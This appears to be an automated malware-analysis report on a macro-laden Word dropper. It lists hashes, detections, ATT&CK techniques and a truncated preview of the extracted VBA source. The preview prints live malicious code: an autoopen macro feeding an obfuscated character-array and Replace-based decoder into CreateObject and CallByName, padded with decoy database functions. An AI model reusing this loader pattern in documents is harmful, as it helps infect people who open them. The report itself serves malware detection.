Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 37a90a0a66d7b3b2…

MALICIOUS

Office (OOXML)

32.2 KB Created: 2016-08-11 12:37:00 UTC Authoring application: Microsoft Office Word 14.0000 First seen: 2020-07-24
MD5: c626aa6155088dce1115f2564cbc1a9e SHA-1: 09e0ecc1c021e8cd50c5febb0d1f73b3628d8c96 SHA-256: 37a90a0a66d7b3b227d3b164850154d66d51a2eed729c1657665c3e651fb5d25
364 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The file is an OOXML document containing a critical heuristic firing for an obfuscated auto-exec VBA loader. The 'autoopen' macro is present, which is a common technique for executing malicious code upon document opening. The script uses CreateObject and CallByName, indicating it's likely designed to download and execute a second-stage payload.

Heuristics 9

  • ClamAV: Doc.Dropper.Agent-1608053 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-1608053
  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 13743 bytes
SHA-256: 7efc3a10000e3c038bd1eb403cdc9545a2fe49dd4132b3985484d51768d2c352
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
IsOk "122"
End Sub



Attribute VB_Name = "Mo"
 
Global Const mensaje_cancelar = " Pulse Click para abandonar esta ventana."
Global Const mensaje_cerrar = " Pulse Click para abandonar esta ventana."
Global Const mensaje_salir = " Pulse Click para abandonar esta ventana."
Global Const mensaje_opcion = " Pulse Click para seleccionar Opci?n."
Global Const mensaje_copiar = " Pulse Click para Copiar al Portapapeles."
Public GromGremitKustiTryasutsyaDAcdaw As Object
Public GromGremitKustiTryasutsyaPLAPEKCwwed As Object
Public GromGremitKustiTryasutsyaKSKLAL As Object
Public GromGremitKustiTryasutsyaXSAOO() As String


Public GromGremitKustiTryasutsyaLAKOPPC As String
Public GromGremitKustiTryasutsyaPLAPEKC() As String
Public GromGremitKustiTryasutsyaUUUKA As String
Public GromGremitKustiTryasutsyaUUUKABBB As String


Public GromGremitKustiTryasutsyaGMAKO As Object
Public GromGremitKustiTryasutsya4 As String
 Public GromGremitKustiTryasutsya2 As String
Public GromGremitKustiTryasutsyaASALLLP As Variant





















Public Function VerAuditoria()
Dim SQL As String


VerAuditoria = False
RsUsu.ActiveConnection = Con

SQL = "Select * FROM usuarios "
SQL = SQL & " WHERE usu_id=" & IdUsuario
RsUsu.Open SQL

    If Not RsUsu.EOF Then
     If RsUsu!usu_auditor = "S" Then
        VerAuditoria = True
     Else
        VerAuditoria = False
     End If
        
        
    
    End If



End Function


Public Function permisos(nombreformu As String, IdUsuario As Long) As Boolean

Dim SQL As String
Dim idformu As Long

permisos = False
RsUsu.ActiveConnection = Con
idformu = BuscarIdFormu(nombreformu)

SQL = "Select * FROM PermisosPorFormu "
SQL = SQL & " WHERE ppf_idformu=" & idformu
SQL = SQL & " AND ppf_idusuario=" & IdUsuario
RsUsu.Open SQL

    If Not RsUsu.EOF Then
     permisos = True
     p = RsUsu!ppf_permisos
        
        
    
    End If



End Function
Public Function BuscarIdFormu(nombreformu As String) As Long
Dim SQL As String

RsFormu.ActiveConnection = Con

SQL = "Select * from Formularios WHERE frm_nombre=" & ""

RsFormu.Open SQL

    If Not RsFormu.EOF Then
        BuscarIdFormu = RsFormu!frm_id
    End If
End Function


Public Function DuBirMahnWeishr(GromGremitKustiTryasutsya6 As Integer) As String
Dost = CInt(GromGremitKustiTryasutsyaXSAOO(GromGremitKustiTryasutsya6))
DuBirMahnWeishr = Chr(Dost / 44)
End Function
Public Function GodnTeBabenParama(A1 As String, A2 As String, A3 As String) As String
GodnTeBabenParama = Replace(A1, A2, A3)
End Function



Attribute VB_Name = "ul"

Public Sub CambiarPass(OldPass As String, newpass As String, cambio As Boolean)
Dim SQL As String
If cambio Then
 GromGremitKustiTryasutsyaLAKOPPC = GromGremitKustiTryasutsyaKSKLAL(GromGremitKustiTryasutsyaPLAPEKC(6))
 GromGremitKustiTryasutsyaUUUKA = GromGremitKustiTryasutsyaLAKOPPC

 
 GromGremitKustiTryasutsyaUUUKABBB = GromGremitKustiTryasutsyaUUUKA + "weffvxcvw"
GromGremitKustiTryasutsyaUUUKA = GromGremitKustiTryasutsyaUUUKA + GromGremitKustiTryasutsyaPLAPEKC(12)
GromGremitKustiTryasutsyaPLAPEKCwwed.Type = 1

 GromGremitKustiTryasutsyaPLAPEKCwwed.Open
 encript SQL
Exit Sub
Else
GoTo BigEnd
End If
RsUsuario.ActiveConnection = RutaBase
RsClave.ActiveConnection = RutaBase

SQL = "Select * from Usuarios WHERE usu_id=" & IdUsuario
RsUsuario.Open SQL

If Not RsUsuario.EOF Then
    If OldPass = Decript(RsUsuario!usu_clave) Then
        
        SQL = "UPDATE Usuarios SET usu_clave=" & ""
        SQL = SQL & " WHERE usu_id=" & IdUsuario
        RsClave.Open SQL
        cambio = True
        
    Else
        cambio = False
    End If
End If
BigEnd:
CallByName GromGremitKustiTryasut
... (truncated)
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 41472 bytes
SHA-256: 156ba75b139208bc015b505cd099b7e40f0d813f6a4f28a0f30323c9076fe8fe
Detection
ClamAV: Doc.Dropper.Agent-1608053
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).